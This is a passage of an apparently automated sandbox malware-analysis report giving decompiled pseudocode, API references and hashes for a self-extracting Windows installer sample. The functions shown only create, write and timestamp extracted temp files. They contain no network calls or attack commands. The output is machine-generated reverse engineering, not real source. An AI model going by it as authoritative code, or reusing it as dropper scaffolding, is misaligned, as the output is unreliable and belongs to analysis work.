                                                						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                						_t30 = E01064C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						E01064B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                						__eflags = _t50;
                                                						if(_t50 != 0) {
                                                							_t51 = _t50 & 0x00000027;
                                                							__eflags = _t51;
                                                						} else {
                                                							_t51 = 0x80;
                                                						}
                                                						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						} else {
                                                							_t33 = 1;
                                                							goto L35;
                                                						}
                                                					}
                                                					_t30 = _t44 - 1;
                                                					__eflags = _t30;
                                                					if(_t30 == 0) {
                                                						goto L3;
                                                					}
                                                					goto L9;
                                                				}
                                                				if(_a4 == 3) {
                                                					_t30 = E01064B60( *((intOrPtr*)(_t75 + 0x14)));
                                                				}
                                                				goto L3;
                                                			}































                                                0x01064cd0
                                                0x01064cdb
                                                0x01064ce0
                                                0x01064ce2
                                                0x01064cee
                                                0x01064cf2
                                                0x01064d0e
                                                0x01064d0e
                                                0x01064d11
                                                0x01064e83
                                                0x01064e88
                                                0x01064e98
                                                0x01064e98
                                                0x01064d17
                                                0x01064d17
                                                0x01064d1a
                                                0x01064d2f
                                                0x01064d2f
                                                0x00000000
                                                0x01064d2f
                                                0x01064d1c
                                                0x01064d1c
                                                0x01064d1f
                                                0x01064dcb
                                                0x01064dd0
                                                0x01064dd2
                                                0x01064ddd
                                                0x01064ddd
                                                0x01064de3
                                                0x01064de8
                                                0x01064ded
                                                0x01064ded
                                                0x01064def
                                                0x01064df0
                                                0x01064df0
                                                0x01064df4
                                                0x01064df4
                                                0x01064df6
                                                0x01064df9
                                                0x01064dfc
                                                0x01064dfc
                                                0x01064dfe
                                                0x01064dff
                                                0x01064dff
                                                0x01064e03
                                                0x01064e08
                                                0x01064e0a
                                                0x01064e0f
                                                0x01064d03
                                                0x01064d03
                                                0x00000000
                                                0x01064d03
                                                0x01064e18
                                                0x01064e20
                                                0x01064e25
                                                0x01064e27
                                                0x00000000
                                                0x00000000
                                                0x01064e33
                                                0x01064e38
                                                0x01064e3a
                                                0x00000000
                                                0x00000000
                                                0x01064e40
                                                0x01064e51
                                                0x01064e56
                                                0x01064e5b
                                                0x01064e5e
                                                0x00000000
                                                0x00000000
                                                0x01064e6a
                                                0x01064e6f
                                                0x01064e71
                                                0x00000000
                                                0x00000000
                                                0x01064e77
                                                0x01064e7d
                                                0x00000000
                                                0x01064e7d
                                                0x01064d25
                                                0x01064d25
                                                0x01064d28
                                                0x01064d36
                                                0x01064d3b
                                                0x01064d40
                                                0x01064d40
                                                0x01064d42
                                                0x01064d43
                                                0x01064d43
                                                0x01064d47
                                                0x01064d4a
                                                0x01064d4a
                                                0x01064d4c
                                                0x01064d4f
                                                0x01064d4f
                                                0x01064d51
                                                0x01064d52
                                                0x01064d52
                                                0x01064d56
                                                0x01064d5b
                                                0x01064d5d
                                                0x01064d62
                                                0x00000000
                                                0x00000000
                                                0x01064d67
                                                0x01064d6f
                                                0x01064d74
                                                0x01064d76
                                                0x00000000
                                                0x00000000
                                                0x01064d7c
                                                0x01064d84
                                                0x01064d89
                                                0x01064d8b
                                                0x00000000
                                                0x00000000
                                                0x01064d94
                                                0x01064d99
                                                0x01064d9e
                                                0x01064da1
                                                0x01064daa
                                                0x01064daa
                                                0x01064da3
                                                0x01064da3
                                                0x01064da3
                                                0x01064db5
                                                0x01064dbb
                                                0x01064dbd
                                                0x00000000
                                                0x01064dc3
                                                0x01064dc5
                                                0x00000000
                                                0x01064dc5
                                                0x01064dbd
                                                0x01064d2a
                                                0x01064d2a
                                                0x01064d2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01064d2d
                                                0x01064cf8
                                                0x01064cfd
                                                0x01064d02
                                                0x00000000

                                                APIs
                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 01064DB5
                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 01064DDD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: AttributesFileItemText
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                • API String ID: 3625706803-2356899610
                                                • Opcode ID: b1da0a2735898d41d299602cf7fe3e5340fb6de678f693caed8371259ad54297
                                                • Instruction ID: 4f1cf3fa804f61876e139037cca66a99d12c6fa2dcd5bb578cff3e9683dda9fb
                                                • Opcode Fuzzy Hash: b1da0a2735898d41d299602cf7fe3e5340fb6de678f693caed8371259ad54297
                                                • Instruction Fuzzy Hash: EA415736A041028BDB71AE3CDD44AF977EDEF66700F0486A8D8C2D7685DA32DA4AC750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01064C37(signed int __ecx, int __edx, int _a4) {
                                                				struct _FILETIME _v12;
                                                				struct _FILETIME _v20;
                                                				FILETIME* _t14;
                                                				int _t15;
                                                				signed int _t21;
                                                
                                                				_t21 = __ecx * 0x18;
                                                				if( *((intOrPtr*)(_t21 + 0x1068d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                					L5:
                                                					return 0;
                                                				} else {
                                                					_t14 =  &_v12;
                                                					_t15 = SetFileTime( *(_t21 + 0x1068d74), _t14, _t14, _t14); // executed
                                                					if(_t15 == 0) {
                                                						goto L5;
                                                					}
                                                					return 1;
                                                				}
                                                			}








                                                0x01064c40
                                                0x01064c4a
                                                0x01064c8d
                                                0x00000000
                                                0x01064c70
                                                0x01064c70
                                                0x01064c7e
                                                0x01064c86
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01064c8a

                                                APIs
                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01064C54
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01064C66
                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 01064C7E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Time$File$DateLocal
                                                • String ID:
                                                • API String ID: 2071732420-0
                                                • Opcode ID: 257df450f572cdcd5dd2b75f2b548eca9c9ecc65b775b695aa0cc8cf7db07ce5
                                                • Instruction ID: 94896b555545a0a57c9d5c150a3f9be765c0af6a61783c1ca86f8bfde68f8c77
                                                • Opcode Fuzzy Hash: 257df450f572cdcd5dd2b75f2b548eca9c9ecc65b775b695aa0cc8cf7db07ce5
                                                • Instruction Fuzzy Hash: F5F0907260020DBFABA4EFA8CC48DFB7FEDEB14250744456BE995D2114EA35D514C7B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E0106487A(CHAR* __ecx, signed int __edx) {
                                                				void* _t7;
                                                				CHAR* _t11;
                                                				long _t18;
                                                				long _t23;
                                                
                                                				_t11 = __ecx;
                                                				asm("sbb edi, edi");
                                                				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                				if((__edx & 0x00000100) == 0) {
                                                					asm("sbb esi, esi");
                                                					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                				} else {
                                                					if((__edx & 0x00000400) == 0) {
                                                						asm("sbb esi, esi");
                                                						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                					} else {
                                                						_t23 = 1;
                                                					}
                                                				}
                                                				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                				if(_t7 != 0xffffffff || _t23 == 3) {
                                                					return _t7;
                                                				} else {
                                                					E0106490C(_t11);
                                                					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                				}
                                                			}







                                                0x01064880
                                                0x0106488c
                                                0x01064894
                                                0x010648a0
                                                0x010648c9
                                                0x010648ce
                                                0x010648a2
                                                0x010648a8
                                                0x010648b7
                                                0x010648bc
                                                0x010648aa
                                                0x010648ac
                                                0x010648ac
                                                0x010648a8
                                                0x010648de
                                                0x010648e7
                                                0x0106490b
                                                0x010648ee
                                                0x010648f0
                                                0x00000000
                                                0x01064902

                                                APIs
                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,01064A23,?,01064F67,*MEMCAB,00008000,00000180), ref: 010648DE
                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,01064F67,*MEMCAB,00008000,00000180), ref: 01064902
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: f77d793f7bb661102d82d53bb0e50bc93710e225666135c469279f61bec5c44b
                                                • Instruction ID: 5b7e2631f6fc01bae5b77ec71a53747074852bd3bb0b6af02dd25c5668036fbb
                                                • Opcode Fuzzy Hash: f77d793f7bb661102d82d53bb0e50bc93710e225666135c469279f61bec5c44b
                                                • Instruction Fuzzy Hash: 7F014BA3E115706AF36450294C88FBB595CCB96A34F1B0335FEEAEB1D1D5644C0482F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E01064AD0(signed int _a4, void* _a8, long _a12) {
                                                				signed int _t9;
                                                				int _t12;
                                                				signed int _t14;
                                                				signed int _t15;
                                                				void* _t20;
                                                				struct HWND__* _t21;
                                                				signed int _t24;
                                                				signed int _t25;
                                                
                                                				_t20 =  *0x106858c; // 0x280
                                                				_t9 = E01063680(_t20);
                                                				if( *0x10691d8 == 0) {
                                                					_push(_t24);
                                                					_t12 = WriteFile( *(0x1068d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                					if(_t12 != 0) {
                                                						_t25 = _a12;
                                                						if(_t25 != 0xffffffff) {
                                                							_t14 =  *0x1069400; // 0xdca00
                                                							_t15 = _t14 + _t25;
                                                							 *0x1069400 = _t15;
                                                							if( *0x1068184 != 0) {
                                                								_t21 =  *0x1068584; // 0x0
                                                								if(_t21 != 0) {
                                                									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10693f8, 0);
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t25 = _t24 | 0xffffffff;
                                                					}
                                                					return _t25;
                                                				} else {
                                                					return _t9 | 0xffffffff;
                                                				}
                                                			}











                                                0x01064ad5
                                                0x01064adb
                                                0x01064ae7
                                                0x01064aee
                                                0x01064b05
                                                0x01064b0d
                                                0x01064b14
                                                0x01064b1a
                                                0x01064b1c
                                                0x01064b21
                                                0x01064b2a
                                                0x01064b2f
                                                0x01064b31
                                                0x01064b39
                                                0x01064b54
                                                0x01064b54
                                                0x01064b39
                                                0x01064b2f
                                                0x01064b0f
                                                0x01064b0f
                                                0x01064b0f
                                                0x01064b5e
                                                0x01064ae9
                                                0x01064aed
                                                0x01064aed

                                                APIs
                                                  • Part of subcall function 01063680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0106369F
                                                  • Part of subcall function 01063680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010636B2
                                                  • Part of subcall function 01063680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010636DA
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 01064B05
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                • String ID:
                                                • API String ID: 1084409-0
                                                • Opcode ID: 7e697a0564143b4c6338fb15bedf11a51ba498dc4274ff8ffa3d75c617d893d9
                                                • Instruction ID: 97622973df91cd31ee687a00963b982cba888359f1f99ef6f9cd1df95ff51e7a
                                                • Opcode Fuzzy Hash: 7e697a0564143b4c6338fb15bedf11a51ba498dc4274ff8ffa3d75c617d893d9
                                                • Instruction Fuzzy Hash: 79019231200211AFE7249F58DC05BA67B9DFB44729F04D265FAB9DB1E4CB769811CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0106658A(char* __ecx, void* __edx, char* _a4) {
                                                				intOrPtr _t4;
                                                				char* _t6;
                                                				char* _t8;
                                                				void* _t10;
                                                				void* _t12;
                                                				char* _t16;
                                                				intOrPtr* _t17;
                                                				void* _t18;
                                                				char* _t19;
                                                
                                                				_t16 = __ecx;
                                                				_t10 = __edx;
                                                				_t17 = __ecx;
                                                				_t1 = _t17 + 1; // 0x1068b3f
                                                				_t12 = _t1;
                                                				do {
                                                					_t4 =  *_t17;
                                                					_t17 = _t17 + 1;
                                                				} while (_t4 != 0);
                                                				_t18 = _t17 - _t12;
                                                				_t2 = _t18 + 1; // 0x1068b40
                                                				if(_t2 < __edx) {
                                                					_t19 = _t18 + __ecx;
                                                					if(_t19 > __ecx) {
                                                						_t8 = CharPrevA(__ecx, _t19); // executed
                                                						if( *_t8 != 0x5c) {
                                                							 *_t19 = 0x5c;
                                                							_t19 =  &(_t19[1]);
                                                						}
                                                					}
                                                					_t6 = _a4;
                                                					 *_t19 = 0;
                                                					while( *_t6 == 0x20) {
                                                						_t6 = _t6 + 1;
                                                					}
                                                					return E010616B3(_t16, _t10, _t6);
                                                				}
                                                				return 0x8007007a;
                                                			}












                                                0x01066592
                                                0x01066594
                                                0x01066596
                                                0x01066598
                                                0x01066598
                                                0x0106659b
                                                0x0106659b
                                                0x0106659d
                                                0x0106659e
                                                0x010665a2
                                                0x010665a4
                                                0x010665a9
                                                0x010665b2
                                                0x010665b6
                                                0x010665ba
                                                0x010665c3
                                                0x010665c5
                                                0x010665c8
                                                0x010665c8
                                                0x010665c3
                                                0x010665c9
                                                0x010665cc
                                                0x010665d2
                                                0x010665d1
                                                0x010665d1
                                                0x00000000
                                                0x010665dc
                                                0x00000000

                                                APIs
                                                • CharPrevA.USER32(01068B3E,01068B3F,00000001,01068B3E,-00000003,?,010660EC,01061140,?), ref: 010665BA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: CharPrev
                                                • String ID:
                                                • API String ID: 122130370-0
                                                • Opcode ID: bc0fbb42ccc5ae1f6548f646444fe717ba9ef054323539dc5d0e276a57d9df31
                                                • Instruction ID: b177eb24085475ce99e74c92769da551d99631b07f286e86ee49aef4a4bfee4d
                                                • Opcode Fuzzy Hash: bc0fbb42ccc5ae1f6548f646444fe717ba9ef054323539dc5d0e276a57d9df31
                                                • Instruction Fuzzy Hash: FAF04C322042509BE332491DD884BAABFDE9BC6250F1801AEE9DAC3209CA678C4583A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E0106621E() {
                                                				signed int _v8;
                                                				char _v268;
                                                				signed int _t5;
                                                				void* _t9;
                                                				void* _t13;
                                                				void* _t19;
                                                				void* _t20;
                                                				signed int _t21;
                                                
                                                				_t5 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t5 ^ _t21;
                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                					0x4f0 = 2;
                                                					_t9 = E0106597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                				} else {
                                                					E010644B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                					 *0x1069124 = E01066285();
                                                					_t9 = 0;
                                                				}
                                                				return E01066CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                			}











                                                0x01066229
                                                0x01066230
                                                0x01066247
                                                0x0106626a
                                                0x01066272
                                                0x01066249
                                                0x01066255
                                                0x0106625f
                                                0x01066264
                                                0x01066264
                                                0x01066284

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0106623F
                                                  • Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                  • Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
                                                  • Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                • String ID:
                                                • API String ID: 381621628-0
                                                • Opcode ID: a24cb0048dfbc5777c8b572bfb549b28badf6e4dc75408d1b94619cbbf21255f
                                                • Instruction ID: 1333910472508d3bfc25455f5b913ce02e48c2664cb09e0d02c44396ef937590
                                                • Opcode Fuzzy Hash: a24cb0048dfbc5777c8b572bfb549b28badf6e4dc75408d1b94619cbbf21255f
                                                • Instruction Fuzzy Hash: B3F08970704209BBE760EB749D05FFE77ACDB64700F40446AA9C6D7191DD7699448750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01064B60(signed int _a4) {
                                                				signed int _t9;
                                                				signed int _t15;
                                                
                                                				_t15 = _a4 * 0x18;
                                                				if( *((intOrPtr*)(_t15 + 0x1068d64)) != 1) {
                                                					_t9 = FindCloseChangeNotification( *(_t15 + 0x1068d74)); // executed
                                                					if(_t9 == 0) {
                                                						return _t9 | 0xffffffff;
                                                					}
                                                					 *((intOrPtr*)(_t15 + 0x1068d60)) = 1;
                                                					return 0;
                                                				}
                                                				 *((intOrPtr*)(_t15 + 0x1068d60)) = 1;
                                                				 *((intOrPtr*)(_t15 + 0x1068d68)) = 0;
                                                				 *((intOrPtr*)(_t15 + 0x1068d70)) = 0;
                                                				 *((intOrPtr*)(_t15 + 0x1068d6c)) = 0;
                                                				return 0;
                                                			}





                                                0x01064b66
                                                0x01064b74
                                                0x01064b98
                                                0x01064ba0
                                                0x00000000
                                                0x01064bac
                                                0x01064ba4
                                                0x00000000
                                                0x01064ba4
                                                0x01064b78
                                                0x01064b7e
                                                0x01064b84
                                                0x01064b8a
                                                0x00000000

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,01064FA1,00000000), ref: 01064B98
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: 5eff183c086720139865cfce501f7c0914fdaa19c1a2e4d0c507f3ba366bc841
                                                • Instruction ID: 47258028646e064364bf3bf03ea4d219ba22d9952403b64ac6b2944a03d14750
                                                • Opcode Fuzzy Hash: 5eff183c086720139865cfce501f7c0914fdaa19c1a2e4d0c507f3ba366bc841
                                                • Instruction Fuzzy Hash: E8F01231540B09AE4771AE29CC0069ABBEAEAB52A0710992FD5EED2150E7316481CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E010666AE(CHAR* __ecx) {
                                                				unsigned int _t1;
                                                
                                                				_t1 = GetFileAttributesA(__ecx); // executed
                                                				if(_t1 != 0xffffffff) {
                                                					return  !(_t1 >> 4) & 0x00000001;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}




                                                0x010666b1
                                                0x010666ba
                                                0x010666c7
                                                0x010666bc
                                                0x010666be
                                                0x010666be

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,01064777,?,01064E38,?), ref: 010666B1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 3be26510a217130ce1d353e4bf05a6cc89721f3669caf979e9918ab97f1bdd1c
                                                • Instruction ID: cf63895b2caa7ff216f5dc335e6880d599bd56e32feb9cfb1d58433a0a985cb3
                                                • Opcode Fuzzy Hash: 3be26510a217130ce1d353e4bf05a6cc89721f3669caf979e9918ab97f1bdd1c
                                                • Instruction Fuzzy Hash: FFB0927A226440826A61163578295562885A7C123A7E41B90F072D11E4CA3FD856D104
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01064CA0(long _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = GlobalAlloc(0, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x01064caa
                                                0x01064cb1

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 01064CAA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 7c1350df908e950946afa652af13f1942a38e67cb6121752f5d03f535b41e93b
                                                • Instruction ID: 54d143a08e587ec30fe70a814d63ce482c98d621aa7692141e3f020b0ec5b2c1
                                                • Opcode Fuzzy Hash: 7c1350df908e950946afa652af13f1942a38e67cb6121752f5d03f535b41e93b
                                                • Instruction Fuzzy Hash: 54B0123214820CF7DF102EC2E809F853F1DE7C4761F140000F60C460508A7794108795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01064CC0(void* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = GlobalFree(_a4); // executed
                                                				return _t2;
                                                			}




                                                0x01064cc8
                                                0x01064ccf

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 5bffc1af65836a73e0c1ee352636ab75cc979840c4aaa0f2eaf3b36555924447
                                                • Instruction ID: 8e096ff2ff3bcb918937dff4184a8cbc335bb50aa93d077a8a05d6c0650b8ccb
                                                • Opcode Fuzzy Hash: 5bffc1af65836a73e0c1ee352636ab75cc979840c4aaa0f2eaf3b36555924447
                                                • Instruction Fuzzy Hash: 5CB0123100010CF78F102A42E8088453F1DD6C03607000010F50C420218B3B98118684
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E01065C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				CHAR* _v265;
                                                				char _v266;
                                                				char _v267;
                                                				char _v268;
                                                				CHAR* _v272;
                                                				char _v276;
                                                				signed int _v296;
                                                				char _v556;
                                                				signed int _t61;
                                                				int _t63;
                                                				char _t67;
                                                				CHAR* _t69;
                                                				signed int _t71;
                                                				void* _t75;
                                                				char _t79;
                                                				void* _t83;
                                                				void* _t85;
                                                				void* _t87;
                                                				intOrPtr _t88;
                                                				void* _t100;
                                                				intOrPtr _t101;
                                                				CHAR* _t104;
                                                				intOrPtr _t105;
                                                				void* _t111;
                                                				void* _t115;
                                                				CHAR* _t118;
                                                				void* _t119;
                                                				void* _t127;
                                                				CHAR* _t129;
                                                				void* _t132;
                                                				void* _t142;
                                                				signed int _t143;
                                                				CHAR* _t144;
                                                				void* _t145;
                                                				void* _t146;
                                                				void* _t147;
                                                				void* _t149;
                                                				char _t155;
                                                				void* _t157;
                                                				void* _t162;
                                                				void* _t163;
                                                				char _t167;
                                                				char _t170;
                                                				CHAR* _t173;
                                                				void* _t177;
                                                				intOrPtr* _t183;
                                                				intOrPtr* _t192;
                                                				CHAR* _t199;
                                                				void* _t200;
                                                				CHAR* _t201;
                                                				void* _t205;
                                                				void* _t206;
                                                				int _t209;
                                                				void* _t210;
                                                				void* _t212;
                                                				void* _t213;
                                                				CHAR* _t218;
                                                				intOrPtr* _t219;
                                                				intOrPtr* _t220;
